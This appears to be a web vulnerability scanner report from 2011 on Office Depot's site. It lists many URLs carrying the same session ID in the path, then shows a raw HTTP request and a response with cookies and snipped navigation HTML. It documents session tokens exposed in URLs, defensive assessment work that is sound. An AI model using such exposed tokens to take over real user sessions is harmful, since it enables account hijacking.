  • http://www.officedepot.com/cart/shoppingCart.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/catalog/AZ.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/catalog/search.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?&Ntt=office+products
  • http://www.officedepot.com/csl/listAll.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?&jtime=1295931847490&jvalidator=REuaHJmhXhcYJBiGGOm5WA%3D%3D
  • http://www.officedepot.com/csl/listAll.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?&jtime=1295931847523&jvalidator=euDUVKp%2Bb%2BhWjIe7QTbpVw%3D%3D
  • http://www.officedepot.com/csl/quickAddBySku.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/csl/saveToListFromCartFlyout.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/customerservice/errata.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/customerservice/index.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/directions.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/environment;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/espanol;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/promo.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/promo/pages/0118_product.jsp
  • http://www.officedepot.com/purchaseGiftCard.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/renderStaticPage.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/womeninbiz/index.jsp&template=companyInfo
  • http://www.officedepot.com/shred;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/businesscenter/odservicesBody.jsp&template=customerservice
  • http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/businesscenter/partners/bbnational.jsp
  • http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/businesscenter/partners/fax2mail.jsp
  • http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/companyfacts/affiliateprogram.jsp&template=companyInfo
  • http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/companyfacts/diversitymissionstatement.jsp&template=companyInfo
  • http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/companyfacts/govprogram.jsp&template=companyInfo
  • http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/companyfacts/index.jsp&template=companyInfo
  • http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/default.jsp&template=companyInfo
  • http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/international/international.jsp&template=companyInfo
  • http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/content/businesstools/forms/default.jsp
  • http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/content/businesstools/sbh/default.jsp
  • http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/creditcard/creditcard.jsp
  • http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/customerservice/Privacy.jsp&template=customerService
  • http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/customerservice/Refunds.jsp&template=customerService
  • http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/customerservice/termsofuse.jsp&template=customerService
  • http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/customerservice/termsofuse.jsp&template=customerService#l1
  • http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/misc/delivery.jsp
  • http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/misc/deliveryOptions.jsp
  • http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/promo/backtoschool/5percent.jsp
  • http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/promo/pages/0127_google.jsp
  • http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/promo/pages/0928_recycling.jsp&template=customerservice
  • http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/promo/pages/christopherlowell.jsp
  • http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/webcafe/main.jsp
  • http://www.officedepot.com/storeDetails.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/storelocator/input.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/videogallery;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/virtualcatalog/virtualcatalog.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • https://www.officedepot.com/account/accountSummaryDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • https://www.officedepot.com/account/editBillingDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • https://www.officedepot.com/account/editContactDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?&jtime=1295931847522&jvalidator=5W7oKmVCxwu%2BVdepVt1BMw%3D%3D
  • https://www.officedepot.com/account/loginAccountDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • https://www.officedepot.com/account/registrationDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • https://www.officedepot.com/account/shippingListDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • https://www.officedepot.com/cart/checkout.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • https://www.officedepot.com/catalogrequest/catalogRequestDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • https://www.officedepot.com/customerservice/customerServiceDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • https://www.officedepot.com/orderhistory/orderHistoryAnonDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • https://www.officedepot.com/orderhistory/orderHistoryList.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • https://www.officedepot.com/orderhistory/submitReturn.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?searchFromDate=12/26/2010&searchToDate=01/25/2011

Request

GET /promo.do HTTP/1.1
Host: www.officedepot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="ALL DEVa TAIa OUR BUS UNI NAV STA PRE" policyref="http://www.officedepot.com/w3c/p3p.xml"
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Tue, 25 Jan 2011 05:04:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic; Path=/
Set-Cookie: jsession_unique_id=1295931847463; Expires=Tue, 25 Jan 2011 06:34:07 GMT; Path=/
Set-Cookie: CU_BRAND=OD; Expires=Fri, 20 Jan 2012 05:04:07 GMT; Path=/
Set-Cookie: IBSD_LOCALE=en_US; Expires=Fri, 20 Jan 2012 05:04:07 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=5yEwWrYJ3VxcYFAH_1ES2aP; Expires=Thu, 24 Feb 2011 05:04:07 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=5yEwWrYJ3VxcYFAH_1ES2aP; Expires=Thu, 24 Feb 2011 05:04:07 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=5yEwWrYJ3VxcYFAH_1ES2aP; Expires=Thu, 24 Feb 2011 05:04:07 GMT; Path=/
Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com
Content-Length: 73834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html class="nojs" xmlns=
...[SNIP]...
<li id="homeLink"><a href="/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Home</a></li>
   
   <li id="languageSwitch"><a href="/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="dropdown">United States (English)</a>
...[SNIP]...
<div class="brandLogo">
       <a href="/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" id="logo" class=""><img src="http://static.www.odcdn.com/images/us/od/brand.gif" alt="OfficeDepot.com - Taking Care Of Business. Office Supplies, Furniture, Technology & More!" title="OfficeDepot.com - Taking Care Of B
...[SNIP]...
<li id='storeLocator' class="overlayContainer">
                   
                                           
                       <a href="/storelocator/input.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" target="_top" class="headingLink"><strong>
...[SNIP]...
<span id="storeLocatorLinks"><a href="/storeDetails.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" id="storeDetailLink" class="">Store Details</a> | <a href="/directions.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Need Directions?</a>
...[SNIP]...
<li id='orderByCatalog' class="overlayContainer">
            <a href="/csl/quickAddBySku.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="headingLink"><strong class="trigger">
...[SNIP]...
<li class=""><a href="/csl/quickAddBySku.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Order by Item #</a>
...[SNIP]...
<li><a href="/virtualcatalog/virtualcatalog.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">View Online Catalog</a>
...[SNIP]...
<li><a href="/a/catalog-request/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Request a Catalog</a>
...[SNIP]...
<div class="smCartSummaryDiv printHide">
                       <a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/misc/deliveryOptions.jsp" class="note">$50.00 more for FREE Next Business Day Delivery!*<br/>
...[SNIP]...
<li id='viewCart'>
                           
                               
                                                                    <a href="/cart/shoppingCart.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic"" class="cart" title="View Cart">View Cart</a>
...[SNIP]...
<li id="checkOut">
                                       
                                   
                                                                                                                                                                                                                       <a href="https://www.officedepot.com/cart/checkout.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic"" class="checkout" title="Checkout">Checkout</a>
...[SNIP]...
<li id="shoppingList">
                   
                       
                           <a href="/csl/listAll.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?&jtime=1295931847490&jvalidator=REuaHJmhXhcYJBiGGOm5WA%3D%3D" class="accountLogin">Shopping List</a>
...[SNIP]...
<div class="b1">
                       <a href="/cart/shoppingCart.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="button">VIEW CART</a>
...[SNIP]...
<div class="b1">
                           <a href="/csl/saveToListFromCartFlyout.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="button accountLogin">Add To My Shopping List</a>
...[SNIP]...
<div class="b1a">
                           
                               
                               <a href="https://www.officedepot.com/cart/checkout.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic"" class="button" title="Checkout">Checkout</a>
...[SNIP]...
<li class="login">
   <a href="https://www.officedepot.com/account/loginAccountDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic"" id="modalAccountLoginID" class="accountLogin" title="Log in"><strong>
...[SNIP]...
<li class="register">&nbsp;-&nbsp;
   <a href="https://www.officedepot.com/account/registrationDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic"" class="" title="Register">Register</a>
...[SNIP]...
<h2>
       <a href="/a/browse/office-supplies/N=5+1676/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a1"><span>
...[SNIP]...
<p class='section'><a id="v2_navtop_office_supplies" href="/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=12157&redirect=false"><img src="http://static.www.odcdn.com/images/us/od/tiles/od_nav_menu_prvt_tile.gif" height="30" width="372" border="0" alt="Save On Office Depot Brand Products!">
...[SNIP]...
<h4><a href="/a/browse/binders-and-accessories/N=5+2155/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Binders &amp; Accessories</a>
...[SNIP]...
<li><a href="/a/browse/binder-accessories/N=5+2156/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Binder Accessories</a>
...[SNIP]...
<li><a href="/a/browse/binders/N=5+2177/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Binders</a>
...[SNIP]...
<li><a href="/a/browse/indexes-tabs-and-dividers/N=5+2228/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Indexes, Tabs &amp; Dividers</a>
...[SNIP]...
<li><a href="/a/browse/binders-and-accessories/N=5+2155/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/basic-supplies/N=5+1886/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Basic Supplies</a>
...[SNIP]...
<li><a href="/a/browse/clips-pushpins-fasteners-and-rubber-bands/N=5+1935/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Clips, Pushpins, Fasteners &amp; Rubber Bands</a>
...[SNIP]...
<li><a href="/a/browse/message-pads-and-memo-books/N=5+2004/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Message Pads &amp; Memo Books</a>
...[SNIP]...
<li><a href="/a/browse/staplers-staples-and-removers/N=5+2113/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Staplers, Staples &amp; Removers</a>
...[SNIP]...
<li><a href="/a/browse/basic-supplies/N=5+1886/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/cleaning-and-breakroom/N=5+2316/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Cleaning &amp; Breakroom</a>
...[SNIP]...
<li><a href="/a/browse/cleaners-and-disinfectants/N=5+2363/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Cleaners &amp; Disinfectants</a>
...[SNIP]...
<li><a href="/a/browse/food-and-beverage/N=5+2546/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Food &amp; Beverage</a>
...[SNIP]...
<li><a href="/a/browse/paper-products-and-dispensers/N=5+2602/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Paper Products &amp; Dispensers</a>
...[SNIP]...
<li><a href="/a/browse/cleaning-and-breakroom/N=5+2316/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/filing-and-storage/N=5+3469/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Filing &amp; Storage</a>
...[SNIP]...
<li><a href="/a/browse/file-folders/N=5+3545/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">File Folders</a>
...[SNIP]...
<li><a href="/a/browse/hanging-file-folders/N=5+3628/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Hanging File Folders</a>
...[SNIP]...
<li><a href="/a/browse/storage--files-boxes-and-more/N=5+3733/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Storage: Files, Boxes &amp; More</a>
...[SNIP]...
<li><a href="/a/browse/filing-and-storage/N=5+3469/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/paper-forms-envelopes/N=5+4072/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Paper, Forms, Envelopes</a>
...[SNIP]...
<li><a href="/a/browse/business-forms-tax-forms-and-recordkeeping/N=5+4094/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Business Forms, Tax Forms &amp; Recordkeeping</a>
...[SNIP]...
<li><a href="/a/browse/envelopes/N=5+4177/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Envelopes</a>
...[SNIP]...
<li><a href="/a/browse/copy-and-multipurpose-paper-white/N=5+487272/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Copy &amp; Multipurpose Paper (White)</a>
...[SNIP]...
<li><a href="/a/browse/paper-forms-envelopes/N=5+4072/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/pens-pencils-and-markers/N=5+4367/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Pens, Pencils &amp; Markers</a>
...[SNIP]...
<li><a href="/a/browse/markers-and-highlighters/N=5+4467/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Markers &amp; Highlighters</a>
...[SNIP]...
<li><a href="/a/browse/pencils/N=5+4504/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Pencils</a>
...[SNIP]...
<li><a href="/a/browse/pens/N=5+4520/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Pens</a>
...[SNIP]...
<li><a href="/a/browse/pens-pencils-and-markers/N=5+4367/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<li>
               <a href="/a/browse/av-supplies-and-equipment/N=5+1677/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">AV Supplies &amp; Equipment</a>
...[SNIP]...
<li>
               <a href="/a/browse/basic-supplies/N=5+1886/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Basic Supplies</a>
...[SNIP]...
<li>
               <a href="/a/browse/binders-and-accessories/N=5+2155/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Binders &amp; Accessories</a>
...[SNIP]...
<li>
               <a href="/a/browse/business-cases/N=5+2674/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Business Cases</a>
...[SNIP]...
<li>
               <a href="/a/browse/calendars-and-planners/N=5+2776/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Calendars &amp; Planners</a>
...[SNIP]...
<li>
               <a href="/a/browse/cleaning-and-breakroom/N=5+2316/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Cleaning &amp; Breakroom</a>
...[SNIP]...
<li>
               <a href="/a/browse/custom-printing/N=5+2930/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Custom Printing</a>
...[SNIP]...
<li>
               <a href="/a/browse/desk-and-wall-accessories/N=5+3347/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Desk &amp; Wall Accessories</a>
...[SNIP]...
<li>
               <a href="/a/browse/executive-gifts/N=5+3415/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Executive Gifts</a>
...[SNIP]...
<li>
               <a href="/a/browse/filing-and-storage/N=5+3469/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Filing &amp; Storage</a>
...[SNIP]...
<li>
               <a href="/a/browse/ink-toner-and-ribbons/N=5+513380/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Ink, Toner &amp; Ribbons</a>
...[SNIP]...
<li>
               <a href="/a/browse/labels-and-label-makers/N=5+3806/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Labels &amp; Label Makers</a>
...[SNIP]...
<li>
               <a href="/a/browse/mailroom-supplies/N=5+3912/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Mailroom Supplies</a>
...[SNIP]...
<li>
               <a href="/a/browse/office-depot-brand-products/N=5+422825/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Office Depot Brand Products</a>
...[SNIP]...
<li>
               <a href="/a/browse/paper-forms-envelopes/N=5+4072/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Paper, Forms, Envelopes</a>
...[SNIP]...
<li>
               <a href="/a/browse/pens-pencils-and-markers/N=5+4367/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Pens, Pencils &amp; Markers</a>
...[SNIP]...
<li>
               <a href="/a/browse/promotional-products/N=5+4581/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Promotional Products</a>
...[SNIP]...
<li>
               <a href="/a/browse/school-supplies/N=5+502600/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">School Supplies</a>
...[SNIP]...
<li>
               <a href="/a/browse/self-stick-notes-and-flags/N=5+6188/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Self-Stick Notes &amp; Flags</a>
...[SNIP]...
<li>
               <a href="/a/browse/tape-and-adhesives/N=5+371557/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Tape &amp; Adhesives</a>
...[SNIP]...
<li>
               <a href="/a/browse/teacher-and-classroom-supplies/N=5+502674/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Teacher &amp; Classroom Supplies</a>
...[SNIP]...
<p><a id="v2_nav_office_supplies_1" href="/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15032&redirect=false">FREE 24-pk AA Batteries with spend of $125 or more on 2 HP Toner cartridges</a>
...[SNIP]...
<p><a id="v2_nav_office_supplies_2" href="/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15033&redirect=false">Save up to 40% off Select Bankers Box Records Storage</a>
...[SNIP]...
<p><a id="v2_nav_office_supplies_3" href="/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15034&redirect=false">Buy any HP LaserJet Printer and any HP Toner and Save $10</a>
...[SNIP]...
<h2>
       <a href="/a/browse/technology/N=5+9021/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a1"><span>
...[SNIP]...
<h4><a href="/a/browse/computer-accessories/N=5+509547/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Computer Accessories</a>
...[SNIP]...
<li><a href="/a/browse/keyboards-and-mice/N=5+509558/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Keyboards &amp; Mice</a>
...[SNIP]...
<li><a href="/a/browse/laptop-accessories/N=5+509569/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Laptop Accessories</a>
...[SNIP]...
<li><a href="/a/browse/powersurge-protectors/N=5+509579/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Power/Surge Protectors</a>
...[SNIP]...
<li><a href="/a/browse/webcams/N=5+509587/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Webcams</a>
...[SNIP]...
<li><a href="/a/browse/computer-accessories/N=5+509547/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/computers-and-servers/N=5+509612/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Computers &amp; Servers</a>
...[SNIP]...
<li><a href="/a/browse/desktop-computers/N=5+509615/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Desktop Computers</a>
...[SNIP]...
<li><a href="/a/browse/laptops/N=5+509617/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Laptops</a>
...[SNIP]...
<li><a href="/a/browse/servers/N=5+510989/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Servers</a>
...[SNIP]...
<li><a href="/a/browse/tablet-pcs/N=5+509621/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Tablet PCs</a>
...[SNIP]...
<li><a href="/a/browse/computers-and-servers/N=5+509612/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/data-storage-and-media/N=5+509625/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Data Storage &amp; Media</a>
...[SNIP]...
<li><a href="/a/browse/external-hard-drives/N=5+509636/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">External Hard Drives</a>
...[SNIP]...
<li><a href="/a/browse/internal-hard-drives/N=5+509641/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Internal Hard Drives</a>
...[SNIP]...
<li><a href="/a/browse/media/N=5+509644/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Media</a>
...[SNIP]...
<li><a href="/a/browse/portable-flash-drives/N=5+509664/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Portable Flash Drives</a>
...[SNIP]...
<li><a href="/a/browse/data-storage-and-media/N=5+509625/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/monitors-and-projectors/N=5+509669/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Monitors &amp; Projectors</a>
...[SNIP]...
<li><a href="/a/browse/interactive-whiteboards/N=5+513187/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Interactive Whiteboards</a>
...[SNIP]...
<li><a href="/a/browse/monitor-accessories/N=5+509672/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Monitor Accessories</a>
...[SNIP]...
<li><a href="/a/browse/monitors/N=5+509676/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Monitors</a>
...[SNIP]...
<li><a href="/a/browse/projectors/N=5+509684/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Projectors</a>
...[SNIP]...
